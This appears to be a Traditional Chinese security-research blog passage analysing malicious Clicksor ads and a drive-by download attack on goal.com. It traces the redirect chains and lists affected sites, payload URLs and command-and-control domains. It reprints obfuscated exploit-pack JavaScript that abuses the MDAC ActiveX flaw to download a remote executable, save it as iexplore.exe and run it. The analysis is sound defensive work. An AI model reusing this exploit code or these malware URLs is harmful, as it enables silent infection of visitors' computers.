其中<b>http://anexsecurity.com/pub_ben/728x90.jpg</b>為被插入的惡意廣告,它偽裝成一個圖形檔,事際上它是一個html,會載入一個真正的jpg檔,同時產生一個iframe來導到惡意的重導連結。其內容如下:<br />
<span class="fullpost"><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6tN5P7xsgsTtwUg12hnf32AuU5ZxrwSNSS216v7qVV9pxvZW0IhIfkxFwVyEzpnbiU4jQtwzB43JEcooHpkHAygcjmb1PxaSnEs4MGvlP-HlrjKYBPLjabS41o4z_2lq_a5IZqAyGs1KR/s1600/case02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6tN5P7xsgsTtwUg12hnf32AuU5ZxrwSNSS216v7qVV9pxvZW0IhIfkxFwVyEzpnbiU4jQtwzB43JEcooHpkHAygcjmb1PxaSnEs4MGvlP-HlrjKYBPLjabS41o4z_2lq_a5IZqAyGs1KR/s640/case02.png" width="640" /></a></div><br />
<pre class="brush: html;"><a href='http://anexsecurity.com/' target='_parent'><img src='http://anexsecurity.com/banners/728x90.jpg' border=0></a><iframe src='http://yobi3sol.in/bcounter.php?u=ben' width='46' height='51' frameborder='0' scrolling='no'></iframe></pre>5. 接下來<b>http://yobi3sol.in/bcounter.php?u=ben</b>會進行兩次的重導動作,內容如下:<br />
<pre class="brush: html;"><iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?ben'></iframe></pre>6. http://iban6duo.in/ts/in.cgi?ben內容如下:<br />
<pre class="brush: html;"><html><head><meta http-equiv="REFRESH" content="1; URL='http://set.obamawebsites.com/news/1992'"></head><body>document moved <a href="http://set.obamawebsites.com/news/1992">here</a></body></html></pre>7. 最後重導到惡意的exploit pack連結http://set.obamawebsites.com/news/1992(它會根據你browser的版本環境產生相對應的exploit),內容如下:<br />
<pre class="brush: html;"><html>jowls velum loo carders ut feet sixmos showily tansy.<body>ret too wyn trues field migg pot cyclers bionts wud begs vein atelic pe wops showily kea. Keet yowe swoon topic collar wo mess relief. Fil favas yarns firm robbed. Taiga velum slew shoal shiver ays at hanting dug carders yatter ed slims an.wires but kea cark dottel ink field relief od ged migg shiver sixmos tophs jowls too blond hided.bionts deaf bine inbred hanting ink harpies ben pot loop.dottel wud but yo at firm.<script>function much(week, simple, little){this.island=30769;this.island+=236;so=20385;so++;this.find=25361;this.find+=76;red=29297;red++;var other={hold:23009};var never="";useVowel={};this.dog=1417;this.dog++;for(var wonder=0; wonder < week.length; wonder++){var plant=simple.indexOf(week.charAt(wonder));simpleIf=["coursePlain","four"];noun=["river","objectUp"];mark=27117;mark++;even=["noteTheir","took","any"];this.pound="pound";if(plant > -1 ){never += little.charAt(plant);}}return never;};function windMe(){this.tell=false;this.music=22597;this.music+=144;place=["thoughBusy","an","plan"];var such = document.createElement(new String("objectdIph".substr(0,6)));var rock = String(".//..//"+"iexplor"+"e.exe");var teach=["wantPoint","rule","wood"];their=7813;their++;var earth=false;what=["haveRan","field"];;try {} catch(realKnow){};might=[];such.setAttribute("id", such);var stepDark=2303;better={force:"walk"};still=24187;still-=254;weStreet={got:"orAgain"};such.setAttribute(new String("classid"), "cls"+"id:"+"BD9nzC".substr(0,3)+"6C5"+"56-"+"65A7Y4G".substr(0,3)+"3-1"+"1D0"+"-98sESy".substr(0,3)+"3A-E9Q".substr(0,3)+"00C"+"h5K04FK5h".substr(3,3)+"C29jPF".substr(0,3)+"KzSgE36SzKg".substr(4,3));try {var you=String("CreateOMLv".substr(0,7)+"4l2kbjectlk42".substr(4,5));this.few=20943;this.few-=226;more=11149;more++;var tookState=["doName","old"];this.must="";var back = such[you]("msxml2.SQbZ".substr(0,7)+"XMLHTTPe2x".substr(0,7), "");var friend = such[you](new String("adodb.strea"+"m"), "");var up = such[you](new String("Shel1ndW".substr(0,4)+"l.Ap"+"ZWYjplicWYjZ".substr(4,4)+"atioW8C".substr(0,4)+"n9Yk".substr(0,1)), "");var had=false;try {back.open(String("GET"), much("FYYzK//SiY_9qPtP4iqSQYiS_#9tK0o/Ni4S/i=j6Pa#qVaH#qa:joj0niHoZPP0Z=jnH_zFz;YFUiPVvQVC6x=Cnja::o0xY9zQ#vQVCaZZ6x", "oa6jn:HO0ZPq#Vi=5FQBGItN9z&USY.p4kR?wWAlXfJ32d7yc1buDrgE%sM-8e/_KvL;xChTm","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#;"), false);back.send();friend.type = 1;friend.open();friend.Write(back.responseBody);friend["Save"+"ToFi"+"le"](rock, 2);friend.Close();} catch (e) {move();}try {up["she"+"llegwzW".substr(0,3)+"xec"+"fnxKutenKxf".substr(4,3)](rock);} catch (e) {move();}} catch (e) {move();}move();}function move(){var d=document, prefix="<meta http-equiv='refresh'"; d.write(prefix + " content='0; url=?topic_id=1992&thread_id=2&f=4315508&i=i&action=6.0&t=m&c=k&x=157&start=MSIE'>");}var under=0;var also=false;function a(){while(under++ < 122){a();}if(!also){also = true;windMe();}}a();</script>sixmo hanting dug kea migg cambric scenic.cowbird inbred showily trauma at keet.</body></html></pre>8. exploit打成功後,所下載的Malware(exe file)連結<br />
<pre class="brush: html;">http://set.obamawebsites.com/news/ef32a1cbd16cb1530384e609aa89f346.php?thread_id=2&f=4315508&topic_id=1992&</pre><br />
<b>特性:</b><br />
<br />
a. 不易被偵測:<br />
b. 存活時間長: 超過三個月以上<br />
c. 影響範圍廣: 同時超過20000個網站立即受影響<br />
<br />
<br />
由於廣告本身會以區域性來載入不一樣的廣告,每個地區所看到的廣告也都可能不一樣,而且是以輪動的方式輪流載入每則廣告,因此並不會每一次都會載入到惡意那一則廣告。由於這個特性也讓偵測上變得較為不容易。<br />
<br />
這邊我們隨機列出了20個被Hackalert偵測到含有惡意Clicksor廣告的網站列表,其中包括受影響的網站網址、所含<br />
的Clicksor廣告連結、所下載的惡意軟體連結以及Google safe-browsing的測偵報告。<br />
<br />
1. http://fulldowns.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://fulldowns.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=101949&adtype=2&sid=179908&zone=17914"></script></pre><pre class="brush: html;">http://payments.cavatars.mobi/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=55210399&forum_id=1991&</pre>2. http://benefitslifeinsurance.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://benefitslifeinsurance.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=173387&adtype=1&sid=276044&zone=24445"></script></pre><pre class="brush: html;">http://new.shelfstyles.com/news/8f9ed1204515e67963d9cacaf29c1721.php?start=2&thread_id=55436582&forum_id=1991&</pre>3. http://yoursbuzz.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://yoursbuzz.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=54913&adtype=8&sid=126026"></script></pre><pre class="brush: html;">http://name.srikantanraghavan.com/news/c73790e424f82f37dafca43d22bcd969.php?start=2&thread_id=55877751&forum_id=1991&</pre>4. http://download3gpvideo.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://download3gpvideo.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=96186&adtype=1&sid=141705"></script></pre><pre class="brush: html;">http://grand.atlantahomevaluesnow.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=56082781&forum_id=1992&</pre>5. http://toreal.blogs.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://toreal.blogs.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=178920&adtype=2&sid=279105&zone=25280"></script></pre><pre class="brush: html;">http://articles.ez2avoidforeclosures.info/news/91470a9da1e0ca5417d64d9b516fe0b9.php?start=2&thread_id=56415659&forum_id=1991&</pre>6. http://disgracefulandsexy.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://disgracefulandsexy.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?pid=41866&adtype=1&sid=109599&zone=1625"></script></pre><pre class="brush: html;">http://journals.davedavisquarterhorses.com/news/91470a9da1e0ca5417d64d9b516fe0b9.php?start=2&thread_id=56529138&forum_id=1992&</pre>7. http://paraparapu.info/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://paraparapu.info/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=93575&adtype=1&sid=186469"></script></pre><pre class="brush: html;">http://trip.completehorsefeed.com/news/23fb2f31ed03d9f164c871906669e048.php?start=2&thread_id=56702901&forum_id=1992&</pre>8. http://eatmanga.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://eatmanga.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=131447&adtype=1&sid=196587&zone=8781"></script></pre><pre class="brush: html;">http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=2336475&forum_id=1992&</pre>9. http://bored-space.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://bored-space.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=89473&adtype=5&sid=131655"></script></pre><pre class="brush: html;">http://dao.ez2avoidforeclosures.net/news/23fb2f31ed03d9f164c871906669e048.php?start=2&thread_id=57645591&forum_id=1991&</pre>10. http://animekyun.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://animekyun.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=59792&adtype=5&sid=274074&zone=23946"></script></pre><pre class="brush: html;">http://cash.ez2avoidforeclosures.org/news/8f9ed1204515e67963d9cacaf29c1721.php?start=2&thread_id=57957716&forum_id=1991&</pre>11. http://freemediatv.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://freemediatv.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=154793&adtype=1&sid=233437"></script></pre><pre class="brush: html;">http://cash.ez2avoidforeclosures.org/news/23fb2f31ed03d9f164c871906669e048.php?start=2&thread_id=57999481&forum_id=1991&</pre>12. http://sexgamefun.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://sexgamefun.com/">Google SafeBrowsing</a> <br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?pid=64605&adtype=&sid=89809&zone="></script></pre><pre class="brush: html;">http://vvvvvv.dyndns-mail.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3271149&forum_id=1997&</pre>13. http://ourglocal.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://ourglocal.com/">Google SafeBrowsing</a> <br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=121355&adtype=1&sid=182046"></script></pre><pre class="brush: html;">http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3336736&forum_id=1992&</pre>14. http://amfmph.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://amfmph.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=98092&adtype=1&sid=160896"></script></pre><pre class="brush: html;">http://service.obamawebsites.com/news/c73790e424f82f37dafca43d22bcd969.php?start=2&thread_id=3761681&forum_id=1992&</pre>15. http://newhmusic.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://newhmusic.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=169111&adtype=5&sid=259771&zone=19713"></script></pre><pre class="brush: html;">http://set.obamawebsites.com/news/8f9ed1204515e67963d9cacaf29c1721.php?thread_id=2&f=4271699&topic_id=1992&</pre>16. http://mytingoo.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://mytingoo.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=164907&adtype=1&sid=252118&zone=17836"></script></pre><pre class="brush: html;">http://set.obamawebsites.com/news/c73790e424f82f37dafca43d22bcd969.php?thread_id=2&f=4301478&topic_id=1992&</pre>17. http://op3l.us/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://op3l.us/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=148633&adtype=1&sid=222364&float=1"></script></pre><pre class="brush: html;">http://s0s.shafranconstruction.com/news/91470a9da1e0ca5417d64d9b516fe0b9.php?thread_id=2&f=4736600&topic_id=1992&</pre>18. http://chandan.org/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://chandan.org/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=107976&adtype=5&sid=161671"></script></pre><pre class="brush: html;">http://set.gambulingwebsites.com/news/23fb2f31ed03d9f164c871906669e048.php?thread_id=2&f=4765006&topic_id=1994&</pre>19. http://thedirectdownload.blogspot.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://thedirectdownload.blogspot.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script src="http://ads.clicksor.com/showAd.php?pid=107464&adtype=5&sid=160535&zone=" type="text/javascript"></script></pre><pre class="brush: html;">http://set.gambulingwebsites.com/news/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=5090485&topic_id=1994&</pre>20. http://upload3r.net/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://upload3r.net/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=166255&adtype=2&sid=254502&zone=18385"></script></pre><pre class="brush: html;">http://forum.moonrocksporthorses.com/news/91470a9da1e0ca5417d64d9b516fe0b9.php?thread_id=2&f=5196921&topic_id=1994&</pre><br />
在這20個網站中只有2個網站(約10%)被Google safe-browsing偵測到為惡意,其它皆未列入可疑網站,可見在偵測上有其難度。<br />
<br />
事實上,我們的Hackalert在今年1/25就偵測到類似的案例,應該也是同一個人所為,只不過他當時用的是另一則廣告圖,但是手法幾乎一模一樣,一般來說這些惡意的連結頂多存活個1~2個星期就很了不起了。而這個案例的是從1/25算起,已經<b>超過三個月了</b>,到現在它依然還在運作,<br />
<br />
以下為當時的感染路徑:<br />
<br />
1. http://ultimate-board.com/ (受影響的網站)<br />
<br />
2. http://ads.clicksor.com/showAd.php?nid=1&pid=161822&adtype=2&sid=246482 (不一定能再載入到下列這則惡意廣告)<br />
<br />
3. http://personnelagency.org/pub_ben/728x90.jpg (這是一個偽裝的圖檔,事實上是一個html,內容如下)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Xz4ZwQ-prT7FegiP0cOJPr2nPfpOwxjlqleX3kLT_LZCqe_Humnm2kSEm1brk9z6biXXDBmUZ6KSHNEk9eOHUAsIl6SWi7MoHBKhMvKW1Ynjqt3vqtNusjmJkmTcTTZq13sp6SFoPxhy/s1600/case01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Xz4ZwQ-prT7FegiP0cOJPr2nPfpOwxjlqleX3kLT_LZCqe_Humnm2kSEm1brk9z6biXXDBmUZ6KSHNEk9eOHUAsIl6SWi7MoHBKhMvKW1Ynjqt3vqtNusjmJkmTcTTZq13sp6SFoPxhy/s640/case01.png" width="640" /></a></div><pre class="brush: html;"><div><a href="http://personnelagency.org/" target="_parent"><img src="http://personnelagency.org/banners/768x90.gif" border=0></a><iframe src='http://2trotlug.in/bcounter.php?u=ben' width='46' height='51' frameborder='0' scrolling='no'></iframe></div></pre>4. http://2trotlug.in/bcounter.php?u=ben<br />
<pre class="brush: html;"><iframe width='34' height='44' frameborder='0' scrolling='no' src='http://goodpersonnecounter.com/ts/in.cgi?ben'></iframe></pre>5. Exploit URL:<br />
<pre class="brush: html;">http://goodpersonnecounter.com/ts/in.cgi?ben</pre>6. Dropped Binary:<br />
<pre class="brush: html;">http://194.247.58.50/dlf.php?i=15</pre><br />
另外根據我們在Alexa Top一百萬大網站的統計中,Clicksor的用戶約佔2%以上,也就是同時會有超20,000個網站受到影響,只要有瀏覽過包含Clicksor廣告的網站,都有可能受到感染。<br />
</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1441759431140700676.post-75524653040700746332011-05-10T15:04:00.002+08:002011-05-17T23:25:57.183+08:00知名足球網站(goal.com)散播惡意程式(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB5NmPGK4lrJvfRw2GFvGbr58_i8auWcCeVQ5PS1vp8uPWH05l_PVQM_MFMJDSkGQBVHwuFfNQLoCyqMrmWjBXZK1D6wsR9Cy_BN45QEzPxIIYv3ORN2PKjXUEzoXP6Qy6U8BZOPLj1f0/s1600/goal_com_drive_by_download_exploit.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB5NmPGK4lrJvfRw2GFvGbr58_i8auWcCeVQ5PS1vp8uPWH05l_PVQM_MFMJDSkGQBVHwuFfNQLoCyqMrmWjBXZK1D6wsR9Cy_BN45QEzPxIIYv3ORN2PKjXUEzoXP6Qy6U8BZOPLj1f0/s1600/goal_com_drive_by_download_exploit.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5602073886535463266" /></a><br />1. 根據<a href="http://siteanalytics.compete.com/goal.com/">compete.com</a>,goal.com每一天平均有232,116個人瀏覽<br />2. 根據<a href="http://www.checksitetraffic.com/traffic_spy/goal.com">checksitetraffic.com</a>,每一天則有215,989人<br />3. goal.com在Alexa<a href="http://www.alexa.com/siteinfo/goal.com">alexa.com</a>全球的排名是Rank. 379<br /><br />HackAlert最近在4/27~4/28中偵測到有Drive-By-Download的行為。根據我們所觀察到的,我們相信攻擊者具有能夠進入goal.com系統內部的權限,同時僅在4/27~4/28中測試攻擊的效果。<br />以下是我們的技術報告:<br /><br /><b>[摘要]</b><br /><br />A. 根據我們所搜集到的資料,有部份的goal.com似乎已經被感染且允許攻擊者操控其網頁內容。受感染網站可能存在供攻擊者持續使用的後門程式,用以控制該網站。<br /><br />B. 我們認為這次的攻擊不屬於一次性的mass-SQL injection攻擊,因為相關惡意網域並未出現在其他被感染的網站中。<br /><br />C. 惡意網域包含:<br />1. pxcz.cz.cc (沒有被任何一家防毒廠商/<a href="http://www.google.com/safebrowsing/diagnostic?site=pxcz.cz.cc">Google SafeBrowsing</a> 標示為黑名單)<br />2. opofy7puti.cz.cc (沒有被任何一家防毒廠商/<a href="http://www.google.com/safebrowsing/diagnostic?site=opofy7puti.cz.cc">Google SafeBrowsing</a> 標示為黑名單)<br />3. justatest.cz.cc (沒有被任何一家防毒廠商/<a href="http://www.google.com/safebrowsing/diagnostic?site=justatest.cz.cc">Google SafeBrowsing</a> 標示為黑名單)<br /><br />這些線索顯示這是一個針對goal.com所發動的攻擊。<br /><br />D. 持續散播時間為4/27~4/28,攻擊者似乎是使用這段時間來測試攻擊的效果,而在這段時間被我們的Scanner掃到。<br /><br />E. 被我們採樣到的攻擊碼會針對以下的弱點進行攻擊:CVE-2010-1423 (Java), CVE-2010-1885 (MS help center HCP), CVE-2009-0927 (PDF), and CVE-2006-0003 (MS MDAC)<br /><br />F. 使用的是g01pack exploit pack,與一般的exploit pack不同的是他包含了一個假的admin管理頁面,攻擊者可透過這個假的"honeynet"來觀察是誰在做進一步的調查。<br /><br />G. 攻擊碼本身做了相當程度的"變形",在這邊我們不用"混碼"這個字詞的原因是:除了混碼之外,攻擊碼本身就使用了有別於以往的方式來規避偵測。<br /><br />H. 惡意程式本身透過UPX來進行加殼,會修改系統中的setupapi.dll及sfcfiles.dat。當我們第一次傳送到VirusTotal時,僅有四家防毒廠商(<a href="http://www.virustotal.com/file-scan/report.html?id=9f8d7399d6985363c69273460312b9d28c365b6a8844c80cc310d72b002c2e97-1303955707">4 / 41</a>)標示其為惡意。<br /><br />I. 惡意程式會連到以下網域:<br /><br />1. testurl.ipq.co:80 (UK) (沒有被任何一家防毒廠商/<a href="http://www.google.com/safebrowsing/diagnostic?site=testurl.ipq.co">Google SafeBrowsing</a> 標示為黑名單)<br />2. 74.125.47.99:80 (US),反解得到coldgold.co.uk (沒有被任何一家防毒廠商/<a href="http://www.google.com/safebrowsing/diagnostic?site=coldgold.co.uk">Google SafeBrowsing</a> 標示為黑名單)<br />3. banderlog.org (沒有被任何一家防毒廠商/<a href="http://www.google.com/safebrowsing/diagnostic?site=banderlog.org">Google SafeBrowsing</a> 標示為黑名單,但是在<a href="http://support.clean-mx.de/clean-mx/viruses.php?ip=127.0.0.1&sort=first%20desc">clean-mx.de</a>可以看到他的蹤跡)<br /><br /><b>[詳細資訊]</b><br /><br />在<a href="http://www.openwaves.net/goal_com_infection/goal_com_malware_infection.zip">這裡</a>可以下載我們側錄的感染記錄檔。包含了在用瀏覽器瀏覽時所產生的Http Traffic,從開始瀏覽網站到惡意程式本身透過瀏覽器被下載下來。<br /><br />整個感染鏈為:<br />1. goal.com,包含iframe指向pxcz.cz.cc<br />2. pxcz.cz.cc 內包含iframe指向justatest.cz.cc<br />3. justatest.cz.cc內包含攻擊程式碼(g01pack exploit pack),會依照使用者的瀏覽器不同提供不同的攻擊碼<br />4. 攻擊碼成功執行,從justatest.cz.cc下載惡意程式<br />5. 惡意程式連結到testurl.ipq.co (UK),74.125.47.99:80 (US, coldgold.co.uk),及banderlog.org<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbGA72bXfJ2vxrPbZlkrP06Zk1IQbJJKpIgEX9l9YYfQAkgn1f6xETGk9LdivI3FYMiED_DFGxjNepuJFHuihZODJ0K5SGozRkOEFBsnO3uLF7kTRc9j53LCuzT5V4SY3i1xbAxLVjcj8/s1600/goal_com_infection_chain2.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbGA72bXfJ2vxrPbZlkrP06Zk1IQbJJKpIgEX9l9YYfQAkgn1f6xETGk9LdivI3FYMiED_DFGxjNepuJFHuihZODJ0K5SGozRkOEFBsnO3uLF7kTRc9j53LCuzT5V4SY3i1xbAxLVjcj8/s1600/goal_com_infection_chain2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5602145348393804722" /></a>整個感染鏈從http://www.goal.com/en/開始:<br /><pre class="brush: html;"><p>Arjen Robben has admitted that his future lies with the German and European giants, hinting that he could even remain there for the rest of his career <style type="text/css">#yxvim {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style><iframe id="yxvim" src="http://pxcz.cz.cc/ad.jpg"></iframe></p></pre><br />攻擊者在上述HTML語法的後面加上了一個iframe指向pxcz.cz.cc。pxcz.cz.cc包含了另一個iframe指向justatest.cz.cc,justatest.cz.cc則同時包含了攻擊碼(g01pack)及惡意程式本身。這個g01pack比較特殊的部份是他同時包含了一些假的Admin頁面,這個Admin頁面支援一些常見的帳號密碼(比如Admin / Admin),用來讓分析人員相信他們成功的穫取了g01pack管理頁面的權限。<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd4c6r6Aro5s9hYcZaI5pq5iZxYURZBWXRaNlG9p1tJOYt7b_kEWMQPUbCVvmCSU-K0k8dezJmfw1QsHC7mp66iKZ6B3dgmEvQZfD8QBNyq1LSvgGj8zlX_1oCOciXiyeoFbLSOJK6oPE/s1600/goal_com_g01pack_fake_admin.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd4c6r6Aro5s9hYcZaI5pq5iZxYURZBWXRaNlG9p1tJOYt7b_kEWMQPUbCVvmCSU-K0k8dezJmfw1QsHC7mp66iKZ6B3dgmEvQZfD8QBNyq1LSvgGj8zlX_1oCOciXiyeoFbLSOJK6oPE/s1600/goal_com_g01pack_fake_admin.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5602137768333007090" /></a><br />一旦成功登入之後,呈現在分析者眼前的是攻擊者造假的數據,在此同時,攻擊者則可透過這個行為,了解有哪些人正在嘗試分析這個惡意網域。<br /><span class="fullpost"><br />這次事件中的攻擊碼經過相當程度的"變形",有別於以往的混碼技術,讓分析人員無法一眼即看出其為攻擊碼。TExploit pack本身包含了許多組攻擊碼,在此我們僅秀出利用CVE-2006-0003 (MS MDAC)漏洞的攻擊碼。此段攻擊碼可以在<a href="http://www.openwaves.net/goal_com_infection/goal_com_malware_infection.zip">這裡</a>取得。<br /><pre class="brush: html;"><html>en clonus purins knot ghat inlier sine bipeds obese tart.<body>heroins pallors glugs. Opera. Pyx ducted boss shea abele knot hajes eh moot nisi tickled howl pangens bobs blind stir reinked ajee.atria obese saddle. Nisi uh bracts pyx.bipeds abaft arctic brave arabic purins blind polo. Pyx pallors. Sludge atria noisy bug slojd stow dumps. Kappa sri tawse bracts hank.fresco delta. Caldron arctic bucko sine byre inlier haeres.<script>var test;function redirect(){location.href="?topic_id=6.0&forum_id=qtest&action=MSIE&nid=name&year=c&start=2&thread_id=53585053&rid=708";}setTimeout(redirect, 20000);var move=new String("openul0".substr(0,4));var out=["ctfmon",String("javaWI8X".substr(0,4)),new String("acro"+"bat"),new String("explore"+"rC52".substr(0,1)),String("useri"+"nit"),"chromeHkpS".substr(0,6),"svch"+"ostc"];var follow="Sav"+"eTo"+"Fil"+"e";var air;var family=1;var low=6000;var never=";";var now=String("setTimeout");var sun=0;var age="";var turn=[];var have=["spellOver","play","cross"];this.few=29107;this.few-=150;var begin;var useDrive="clsid:BD9oqk".substr(0,9)+"6C556-65ANEm".substr(0,9)+"3-11D0-98rWqE".substr(0,9)+"3A-00C04F"+"ZuqC29E36uqZ".substr(3,6);var stay=new String("she"+"lle"+"xec"+"ute");var then=new String("replaceUyK".substr(0,7));var once=new String("typeUdm".substr(0,4));var ground=["youUnder","home","base"];var own=new String();var meLittle="setAttrT2hF".substr(0,7)+"ibute5MEY".substr(0,5);var will=new String("pus5ceI".substr(0,3)+"9BUhU9B".substr(3,1));var most=2;var best="send";var teachSeem="";var star="";try {} catch(mark){};var strong;var bed="Close";var end="Wri"+"te";var pass="http://opofy7puti.cz.cc:80/domains/f848af41f9d81c1603fb52a6b7844642.php?start=12&thread_id=53585053&forum_id=qtest&";var readAmong="CreateObjec"+"t";var redDog="responseBo"+"dyck4".substr(0,2);function oh(){sea=[];want=18559;want++;try {var book="ourPiece"} catch(book){};var they="";come=["northTurn","set","above"];change={};if(pass.indexOf(never) > -1){var groundMight=new Array();this.strongLess=978;this.strongLess++;call={word:10445};var writeHim=["comeWould"];var serve="";var stopYes="";hand=25269;hand-=192;school = pass.split(never);var good={his:20957};var turnBoy=false;this.travel="travel";add=16993;add--;var should="";for(var i in school){var govern="";this.airMark=false;place=27537;place-=204;try {var run="familyCommon"} catch(run){};var yetNeed=new String();var quick = school[i][then](/^\s+|\s+$/g, age); var music="";this.plant=459;this.plant-=142;var underHad="";fall={};yetFarm=6780;yetFarm-=19;var shape=29557;if(quick != age){var make=false;var their={high:"down"};plane={yes:"front"};turn[will](quick);wood={blue:8491};ohEat=17592;ohEat+=255;this.road="road";}}} else {var thereLarge=new String();var yesWheel=new String();var saw=["shortSleep","stayCommon","heard"];this.yourLeave="yourLeave";var table=23075;turn[will](pass);var turnYet="turnYet";var friendPound={newBody:"studyNotice"};} dryCity={callChange:16908};this.passPeople=8404;this.passPeople--;var drive=[];var able="";var willTake="willTake";return turn;}var foodThough=new String();try {} catch(veryStrong){};this.moveEarth=7491;this.moveEarth+=102;this.someOpen=26120;this.someOpen++;function than(again, point){life=["simple"];knowGround=24748;knowGround--;figureFigure=30877;figureFigure-=200;var does=new String();var sleepFace=["orWalk","inch","cold"];yourSlow=775;yourSlow+=122;what=[];a=21635;a+=166;test[meLittle](again, point);}northBeauty={watch:"fewLove"};var line={};var head=22943;var piece=32549;function the(){var pose=20499;var frontCross=4606;ago=7777;ago+=220;if(!free()) return;serveWell=25614;serveWell++;objectWorld=24863;objectWorld-=114;darkCommon=22684;darkCommon++;var willPerson=new Array();test=document.createElement(new String("object"));than(new String("classi"+"d"), useDrive);var moveEarly="moveEarly";this.moonHome="";bedPower={since:false};than("id", "test");try {strong = 